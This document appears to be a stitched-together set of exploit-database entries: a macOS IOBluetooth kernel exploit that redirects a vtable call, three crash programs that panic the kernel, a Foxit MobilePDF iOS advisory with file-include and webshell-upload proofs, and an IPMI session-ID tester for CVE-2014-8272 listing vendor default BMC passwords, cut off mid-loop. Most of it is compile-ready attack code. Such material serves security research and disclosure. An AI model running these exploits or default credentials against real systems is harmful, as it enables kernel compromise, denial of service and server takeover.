| (((uint64_t)(num) << 8) & UINT64_C(0x000000FF00000000)) \
| (((uint64_t)(num) >> 8) & UINT64_C(0x00000000FF000000)) \
| (((uint64_t)(num) >> 24) & UINT64_C(0x0000000000FF0000)) \
| (((uint64_t)(num) >> 40) & UINT64_C(0x000000000000FF00)) \
| (((uint64_t)(num) >> 56) ) )
#endif
void create_requests(io_connect_t port)
{
struct BluetoothCall a;
uint32_t i;
kern_return_t kr;
for (i = 0; i < 7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* DispatchHCIRequestCreate() */
a.index = 0x0;
*(uint64_t *)a.args[0] = 5*1000; /* Timeout */
memset((void *)a.args[1], 0x81, 0x1000);
memset((void *)a.args[2], 0x82, 0x1000);
memset((void *)a.args[3], 0x83, 0x1000);
memset((void *)a.args[4], 0x84, 0x1000);
memset((void *)a.args[5], 0x85, 0x1000);
memset((void *)a.args[6], 0x86, 0x1000);
for(i = 0; i < 500; i++) {
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
if(kr == 0xe00002bd) /* Full */
break;
}
}
int main(void) {
struct BluetoothCall a;
int i;
void *landing_page = calloc(SIZE, sizeof(char));
/* Init a */
for (i = 0; i < 7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
/* Populating with fake requests. */
create_requests(port);
/* IOBluetoothHCIUserClient::DispatchHCIWriteStoredLinkKey() */
a.index = 42;
/* Req number */
*((uint32_t *)a.args[0]) = 1;
/* num_of_keys */
*((uint32_t *)a.args[1]) = 0x20;
/* Padding */
memset((void *)a.args[3], 0x33, 152);
/* mov rdi, [r14+0AB8h] */
*((uint64_t *)(a.args[3]+152)) = bswap64((uint64_t)landing_page);
/* mov rax, [rdi] */
*((uint64_t *)((uint64_t)landing_page)) = (uint64_t)landing_page;
/* call [rax+0x1d0]: this will trigger a #GP calling 0x4141414142424242 */
*((uint64_t *)((uint64_t)landing_page+0x1d0)) = (uint64_t) 0x4141414142424242;
/* Here some fixing to the vtable is required to return cleanly after the exploit */
#if 0
/* Debug print */
for(i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
#endif
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}
Document Title:
===============
Foxit MobilePDF v4.4.0 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1400
Release Date:
=============
2015-01-12
Vulnerability Laboratory ID (VL-ID):
====================================
1400
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
Foxit MobilePDF enables you to view and annotate PDF documents on the go, allowing you to work on your PDF documents anytime, anywhere.
Specify the permissions to restrict operations to PDF files, such as copying content, adding annotation, managing page & bookmark, and printing.
Share, store and synchronize PDF files.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/foxit-mobile-pdf/id507040546 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-01-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Foxit Corporation
Product: MobilePDF - iOS Web Application (Wifi) 4.4.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
The local file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The vulnerability is located in the `filename` value of the wifi interface `upload` module. Local attackers are able to manipulate the
wifi web interface by usage of the vulnerable `upload` POST method request. The service does not encode or parse the `filename` context
on uploads. Attackers can include an existing local application path or an existing local device path as source in connection with script
code to compromise the iOS app. The execution of unauthorized local file or path request occurs in the index of documents module of the
wifi file service application after the inject. The request method to inject is POST and the attack vector is located on the application-side
of the affected iOS application.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
Exploitation of the local file include web vulnerability in the upload module requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include web vulnerability results in mobile application compromise or compromised device components.
Vulnerable Method(s):
[+] POST
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename (name)
Affected Module(s):
[+] Index of Documents (http://localhost:8888)
1.2
An arbitrary file upload web vulnerability has been discovered in the official Foxit MobilePDF v4.4.0 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the system validation and compromise the web-server.
The vulnerability is located in the filename value of the `upload` file module. Remote attackers are able to upload a php or js web-shell by a rename of the
filename with multiple extensions in the upload POST method request. The attacker uploads for example a web-shell with the following name and extension
`pentest.png.html.php.js.aspx.png`. After the upload the attacker needs to open the file in the wifi web-application interface. He deletes the .png file
extension and can access the webshell with elevated access rights to execute.
The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.6.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the arbitrary file upload vulnerability results in unauthorized file access (aap/device) and compromise of http web-server.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] Index of Documents (http://localhost:8888)
Proof of Concept (PoC):
=======================
1.1
The local file include vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Download and install the FoxIT MobilePDF iOS application
2. Surf to the Documents Index of the Wifi Server (http://localhost:8888)
3. Start to choose a file for the upload function by usage of the search
4. Intercept the session by usage of a tamper and change the name value to the local device path source
5. Continue the request and save the settings. After that go back to the Index of Documents
Note: The execution of the script code occurs in the vulnerable name value of the index file dir list
6. Successful reproduce of the security vulnerability!
PoC: Index of Documents (Name)
<tr><td><a href="/<img src="><img src="./[LOCAL FILE INCLUDE VULNERABILITY!]</a"></a></td><td align="center">file</td>
<td align="center"><span class="m">2015-01-10 13:49</span></td><td align="center"><span class="s">538 B</span></td></tr>
--- PoC Session Logs [POST] (File Include > Upload)---
Status: 200[OK]
POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3624] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent
[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3796507625132
Content-Disposition: form-data; name="button";
filename="./[LOCAL FILE INCLUDE VULNERABILITY!]+2.png"
Content-Type: image/png
--- PoC Session Logs [GET] (File Dir Index List)---
13:54:26.427[48ms][total 48ms] Status: 200[OK]
GET http://localhost:8888/%3C/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_NORMAL] Größe des Inhalts[142] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[142]
Date[Sa., 10 Jan. 2015 12:49:30 GMT]
Reference(s):
http://localhost:8888/
http://localhost:8888/%3C/./
1.2
The arbitrary file upload vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: URL
http://localhost:8888/./webshell.png.html.php
PoC: Index of Documents
<tr><td><a href="/webshell.png.html.php.js.png">webshell.png.html.php.js.png</a></td>
<td align="center">file</td><td align="center"><span class="m">2015-01-10 13:58</span></td>
<td align="center"><span class="s">538 B</span></td></tr>
--- PoC Session Logs [POST] ---
14:03:16.481[149ms][total 1583ms] Status: 200[OK]
POST http://localhost:8888/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[3883] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8888]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8888/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------282243582256
Content-Disposition: form-data; name="button"; filename="webshell.png.html.php.js.png"
Content-Type: image/png
Reference(s):
http://localhost:8888/
http://localhost:8888/./webshell.png.html.php
Solution - Fix & Patch:
=======================
1.1
The file include vulnerability can be paütched by a secure parse and encode of the vulnerable `filename` value in the upload POST method request.
Restrict the filename input and filter with an own set exception to prevent application-side attacks.
Parse also in the Index of Documents the vulnerable name output value to solve the issue.
1.2
Restrict the vulnerable `filename` value and implement a secure filter mechanism with own exception to prevent the upload of files with multiple extensions.
Restrict the upload folder and disallow the execution of files that are already uploaded.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POSt method request is estimated as high. (CVSS 6.9)
1.2
The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
/*
* crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
*
* Exploits a missing check in
* IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic.
*
* gcc -Wall -o crash-issue3{,.c} -framework IOKit
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
struct BluetoothCall {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
memset(&a, 0, sizeof(a));
a.sizes[0] = 0x1000;
a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));
a.sizes[1] = 0x1000;
a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
memset((void *)a.args[1], 0x22, 0x1000);
/* Call DispatchHCISendRawACLData() */
a.index = 0x63;
/* Debug */
for(int i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
fflush(stdout);
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}
/*
* crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
*
* Triggers a panic overwriting a stack_canary.
*
* gcc -Wall -o crash-issue2{,.c} -framework IOKit
*
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
struct BluetoothCall {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
a.sizes[0] = 0x1000;
a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));
/* This arguments overflows a local buffer and the adjacent stack canary */
a.sizes[1] = 264;
a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
memset((void *)a.args[1], 'A', a.sizes[1]);
/* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */
a.index = 0x2d;
/* Debug */
for(int i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
fflush(stdout);
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
sizeof(a), /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}
/*
* crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
*
* Exploits a missing check in
* IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic.
*
* gcc -Wall -o crash-issue1{,.c} -framework IOKit
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>
#include <IOKit/IOKitLib.h>
#define SIZE 0x1000
struct BluetoothCall {
uint64_t args[7];
uint64_t sizes[7];
uint64_t index;
};
int main(void) {
/* Finding vuln service */
io_service_t service =
IOServiceGetMatchingService(kIOMasterPortDefault,
IOServiceMatching("IOBluetoothHCIController"));
if (!service) {
return -1;
}
/* Connect to vuln service */
io_connect_t port = (io_connect_t) 0;
kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
IOObjectRelease(service);
if (kr != kIOReturnSuccess) {
return kr;
}
printf(" [+] Opened connection to service on port: %d\n", port);
struct BluetoothCall a;
int i;
for (i=0; i<7; i++) {
a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
a.sizes[i] = SIZE;
}
/* This value causes IOMalloc() to fail */
a.args[6] = 0x0;
a.sizes[6] = 0x80000041;
a.index = 0x06; /* DispatchHCICreateConnection() */
for(i = 0; i < 120; i++) {
if(i % 8 == 0) printf("\n");
printf("\\x%02x", ((unsigned char *)&a)[i]);
}
printf("\n");
kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
(uint32_t) 0, /* Selector */
NULL, 0, /* input, inputCnt */
(const void*) &a, /* inputStruct */
120, /* inputStructCnt */
NULL, NULL, NULL, NULL); /* Output stuff */
printf("kr: %08x\n", kr);
return IOServiceClose(port);
}
"""
For testing purposes only.
(c) Yong Chuan, Koh 2014
"""
from time import sleep
from socket import *
from struct import *
from random import *
import sys, os, argparse
HOST = None
PORT = 623
bufsize = 1024
recv = ""
# create socket
UDPsock = socket(AF_INET,SOCK_DGRAM)
UDPsock.settimeout(2)
data = 21 #offset of data start
RMCP = ('\x06' + #RMCP.version = ASF RMCP v1.0
'\x00' + #RMCP.reserved
'\xFF' + #RMCP.seq
'\x07' #RMCP.Type/Class = Normal_RMCP/IPMI
)
def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None):
auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}
sess_header = ''
sess_header += pack('<B', auth_types[auth_type])
sess_header += pack('<L', seq_num)
sess_header += pack('<L', sess_id)
if auth_type is not 'None':
raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd
import hashlib
h = hashlib.md5(raw)
sess_header += h.digest()
sess_header += pack('B', len(ipmi))
return sess_header
class CreateIPMI ():
def __init__ (self):
self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 }
self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'}
self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}
def CheckSum (self, bytes):
chksum = 0
q = ''
for i in bytes:
q += '%02X ' %ord(i)
chksum = (chksum + ord(i)) % 0x100
if chksum > 0:
chksum = 0x100 - chksum
return pack('>B', chksum)
def Header (self, cmd, seq_num=0x00):
#only for IPMI v1.5
cmds = {'Get Channel Auth Capabilities' : (0x06, 0x38), #(netfn, cmd_code)
'Get Session Challenge' : (0x06, 0x39),
'Activate Session' : (0x06, 0x3a),
'Set Session Privilege Level' : (0x06, 0x3b),
'Close Session' : (0x06, 0x3c),
'Set User Access' : (0x06, 0x43),
'Get User Access' : (0x06, 0x44),
'Set User Name' : (0x06, 0x45),
'Get User Name' : (0x06, 0x46),
'Set User Password' : (0x06, 0x47),
'Get Chassis Status' : (0x00, 0x01)}
ipmi_header = ''
ipmi_header += pack('<B', 0x20) #target addr
ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) #netfn | target lun
ipmi_header += self.CheckSum (ipmi_header)
ipmi_header += pack('<B', 0x81) #source addr
ipmi_header += pack('<B', seq_num<<2 | 0) #seq_num | source lun
ipmi_header += pack('<B', cmds[cmd][1]) #IPMI message command
return ipmi_header
def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'):
ipmi = ''
ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq)
ipmi += pack('<B', 0<<7 | chn) #IPMI v1.5 | chn num (0-7, 14=current_chn, 15)
ipmi += pack('<B', self.priv_lvls[priv_lvl]) #requested privilege level
ipmi += self.CheckSum (ipmi[3:])
return ipmi
def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'):
#only for IPMI v1.5
ipmi = ''
ipmi += self.Header('Get Session Challenge', hdr_seq)
ipmi += pack('<B', self.auth_types[auth_type]) #authentication type
ipmi += username #user name
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'):
#only for IPMI v1.5
ipmi = ''
ipmi += self.Header('Activate Session', hdr_seq)
ipmi += pack('>B', self.auth_types[auth_type])
ipmi += pack('>B', self.priv_lvls[priv_lvl])
ipmi += authcode #challenge string
ipmi += pack('<L', 0xdeadb0b0) #initial outbound seq num
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'):
#only for IPMI v1.5
ipmi = ''
ipmi += self.Header('Set Session Privilege Level', hdr_seq)
ipmi += pack('>B', self.priv_lvls[priv_lvl])
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def CloseSession (self, hdr_seq, sess_id):
ipmi = ''
ipmi += self.Header ("Close Session", hdr_seq)
ipmi += pack('<L', sess_id)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def GetChassisStatus (self, hdr_seq):
ipmi = ''
ipmi += self.Header ("Get Chassis Status", hdr_seq)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def GetUserAccess (self, hdr_seq, user_id, chn_num=0x0E):
ipmi = ''
ipmi += self.Header ("Get User Access", hdr_seq)
ipmi += pack('>B', chn_num) #chn_num = 0x0E = current channel
ipmi += pack('>B', user_id)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def GetUserName (self, hdr_seq, user_id=2):
ipmi = ''
ipmi += self.Header ("Get User Name", hdr_seq)
ipmi += pack('>B', user_id)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SetUserName (self, hdr_seq, user_id, user_name):
#Assign user_name to user_id, replaces if user_id is occupied
ipmi = ''
ipmi += self.Header ("Set User Name", hdr_seq)
ipmi += pack('>B', user_id)
ipmi += user_name.ljust(16, '\x00')
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SetUserPassword (self, hdr_seq, user_id, password, op='set password'):
ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3}
ipmi = ''
ipmi += self.Header ("Set User Password", hdr_seq)
ipmi += pack('>B', user_id)
ipmi += pack('>B', ops[op])
ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E):
ipmi = ''
ipmi += self.Header ("Set User Access", hdr_seq)
ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn) #bit4=1=enable user for IPMI Messaging | chn=0xE=current channel
ipmi += pack('>B', user_id)
ipmi += pack('>B', self.priv_lvls[new_priv])
ipmi += pack('>B', 0)
ipmi += self.CheckSum(ipmi[3:])
return ipmi
def SendUDP (pkt):
global HOST, PORT, data
res = ''
code = ipmi_seq = 0xFFFF
for i in range(5):
try:
UDPsock.sendto(pkt, (HOST, PORT))
res = UDPsock.recv(bufsize)
except Exception as e:
print '[-] Socket Timeout: Try %d'%i
sleep (0)
else:
#have received a reply
if res[4:5] == '\x02': #Session->AuthType = MD5
data += 16
code = unpack('B',res[data-1:data])[0]
ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2
if res[4:5] == '\x02':
data -= 16
break
return code, ipmi_seq, res
def SetUpSession (username, pwd, priv='Admin', auth='MD5'):
global data
#Get Channel Authentication Capabilities
ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
if code != 0x00:
return code, 0, 0, 0
#print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq)
#Get Session Challenge
ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5')
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
if code != 0x00:
if code == 0xFFFF:
print "[-] BMC didn't respond to IPMI v1.5 session setup"
print " If firmware had disabled it, then BMC is not vulnerable"
return code, 0, 0, 0
temp_sess_id = unpack('<L', res[data:data+4])[0]
challenge_str = res[data+4:data+4+16]
#print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq)
#Activate Session
ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi)
if code != 0x00:
return code, 0, 0, 0
data += 16
sess_auth_type = unpack('B', res[data:data+1])[0]
sess_id = unpack('<L', res[data+1:data+1+4])[0]
ini_inbound = sess_hdr_seq = unpack('<L', res[data+5:data+5+4])[0]
sess_priv_lvl = unpack('B', res[data+9:data+9+1])[0]
#print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq)
#print ' %-30s: Session_ID %08X'%sess_id
data -= 16
#Set Session Privilege Level
ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi)
sess_hdr_seq += 1
if code != 0x00:
return code, 0, 0, 0
new_priv_lvl = unpack('B', res[data:data+1])[0]
#print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq)
return code, temp_sess_id, sess_hdr_seq, sess_id
def CloseSession (sess_seq, sess_id):
global data
#Close Session
ipmi = CreateIPMI().CloseSession(5, sess_id)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
#print '[+]%-30s: %02X (%d)'%('Close Session', code, ipmi_seq)
return code
def CheckSessionAlive(sess_seq, sess_id):
#SetUserPassword(): "user enable <user_id>"
ipmi = CreateIPMI().GetChassisStatus(31)
code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq)
sess_seq += 1
return sess_seq
def banner():
print ("######################################################\n"+\
"## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\
"## (http://www.kb.cert.org/vuls/id/843044)\n"+\
"## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\
"## and checking that these values are incremental\n"+\
"## \n"+\
"## Author: Yong Chuan, Koh\n"+\
"## Email: yongchuan.koh@mwrinfosecurity.com\n"+\
"## (c) Yong Chuan, Koh 2014\n"+\
"######################################################\n")
def main():
banner()
#default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi)
vendors = {"HP" :{"user":"Administrator", "pwd":""}, #no default pwd: <factory randomized 8-character string>
"DELL" :{"user":"root", "pwd":"calvin"},
"IBM" :{"user":"USERID", "pwd":"PASSW0RD"},
"FUJITSU" :{"user":"admin", "pwd":"admin"},
"SUPERMICRO" :{"user":"ADMIN", "pwd":"ADMIN"},
"ORACLE" :{"user":"root", "pwd":"changeme"},
"ASUS" :{"user":"admin", "pwd":"admin"}
}
arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values")
arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server")
arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)")
arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)")
arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)")
arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)")
args = arg.parse_args()
if args.vendor is not None: args.vendor = args.vendor.upper()
if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None):
print "[-] Error: -n and -p are required because -v is not specified/in default list"
print " Vendors with Default Accounts"
print " -----------------------------------"
for vendor,acct in vendors.iteritems():
print " %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"])
sys.exit(1)
if args.username is None: args.username = vendors[args.vendor]["user"].ljust(16, '\x00')
if args.password is None: args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00')
global HOST, PORT
HOST = args.ip
PORT = args.udpport
print "Script Parameters"
print "-------------------------"
print "IP : %s"%HOST
print "Port : %d"%PORT
print "Username : %s"%args.username
print "Password : %s"%args.password
session_ids = []
for i in xrange(0x80): #do not go beyond 0xFF, because of how session_ids is checked for incremental later
try:
code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5')
if code == 0:
session_ids.append(temp_sess_id)
session_ids.append(sess_id)
print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id)
else:
#print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i)
sleep(5)
